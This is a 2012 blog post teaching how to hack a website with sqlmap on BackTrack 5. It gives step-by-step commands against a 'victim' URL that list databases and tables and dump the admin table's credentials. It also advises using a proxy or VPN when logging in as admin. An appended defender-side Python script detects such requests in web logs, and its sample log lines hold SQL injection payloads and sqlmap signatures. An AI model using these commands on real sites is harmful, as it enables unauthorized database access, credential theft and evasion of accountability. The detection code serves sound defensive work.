Wednesday, October 24, 2012

How to Hack a Site Using sqlmap | Hacking a Website Using sqlmap on BackTrack 5

What is BackTrack?

BackTrack is an Ubuntu-based operating system. BackTrack is the best operating system for security professionals and hackers. BackTrack 5 has lots of built-in tools and tool categories, like sqlmap, Metasploit, information gathering, maintaining access, backdooring, etc.


How can I download BackTrack?


Well, you can download BackTrack 5 here.
Select the version of the OS. I recommend BackTrack 5 R2 (because it is the latest version).

How to install BackTrack?


You can install it by making a flash drive or by burning a DVD. I recommend making a flash drive and installing from it. (create flash drive of backtrack

What to do after installing?

The default ID and password of this operating system are root and toor, so after installing BackTrack, restart your computer and enter this ID and password.
Now, if you want to use the GUI, simply type startx to enter the GUI of BackTrack 5.


Follow these simple steps to hack a website using the sqlmap tool in BackTrack 5.

1. Open your BackTrack terminal, type cd /pentest/database/sqlmap and hit Enter. You are now in the sqlmap directory in your terminal.
2. Now find the vulnerable site. (Well, I already have a vulnerable site.)
[Screenshot: sql map 2]
3. Now type this command in the terminal and hit Enter (refer to the figure above).
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs

4. Now you will get the database names of the website.
Well, I got two databases, aj and information_schema. We will select the aj database.

5. Now get the tables of that database. For that, you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables

6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj --tables

7. Now you will get the list of tables stored in the aj database.

8. Now let's grab the columns from the admin table.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we have the columns, and among them are username and password.
9. Now let's grab the passwords of the admin.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we have the username and the password of the website!
Now just find the admin panel of the website, and use a proxy/VPN when you are trying to log in to the website as an admin.
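
Seen from the defender's side, the requests generated by the steps above show up in the web server's access log. The following is an added example, not part of the original post, that flags them by looking for sqlmap's default User-Agent prefix and for non-integer or SQL-bearing values in the id parameter. The log lines, IP addresses, sqlmap version string and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: ip - - [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SQL_TOKENS = re.compile(r"information_schema|union\s+(all\s+)?select", re.I)
INTEGER = re.compile(r"[0-9]+")

def classify(line):
    """Return (client_ip, reasons); reasons is empty for a benign-looking request."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    reasons = []
    if m["ua"].lower().startswith("sqlmap/"):      # sqlmap's default User-Agent prefix
        reasons.append("sqlmap default User-Agent")
    # parse_qs percent-decodes, so encoded payloads are inspected in clear text.
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for value in params.get("id", []):             # "id" is the parameter used in the post
        if not INTEGER.fullmatch(value):
            reasons.append("non-integer id value")
        if SQL_TOKENS.search(value):
            reasons.append("SQL keywords in id value")
    return m["ip"], reasons

def summarize(lines, min_hits=2):
    """Group suspicious requests by client IP; keep IPs with at least min_hits of them."""
    hits = defaultdict(lambda: {"count": 0, "reasons": set()})
    for line in lines:
        ip, reasons = classify(line)
        if reasons:
            hits[ip]["count"] += 1
            hits[ip]["reasons"].update(reasons)
    return {ip: h for ip, h in hits.items() if h["count"] >= min_hits}

# Constructed sample lines (documentation IP ranges, made-up sizes and timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Oct/2012:10:01:02 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Oct/2012:10:02:10 +0000] "GET /index.php?id=4%27 HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.9 - - [24/Oct/2012:10:02:11 +0000] "GET /index.php?id=4%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.0.2.44 - - [24/Oct/2012:10:05:00 +0000] "GET /index.php?id=4+AND+1%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [24/Oct/2012:10:05:03 +0000] "GET /index.php?id=-1+UNION+SELECT+schema_name+FROM+information_schema.schemata HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, h in summarize(SAMPLE_LOG).items():
        print(ip, h["count"], sorted(h["reasons"]))
```

The User-Agent is client-controlled, so the non-integer id check is the stronger of the two signals. Detection does not replace the fix, which is to bind id as a parameter in the query instead of concatenating it into the SQL string.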

Source : Hack For Security
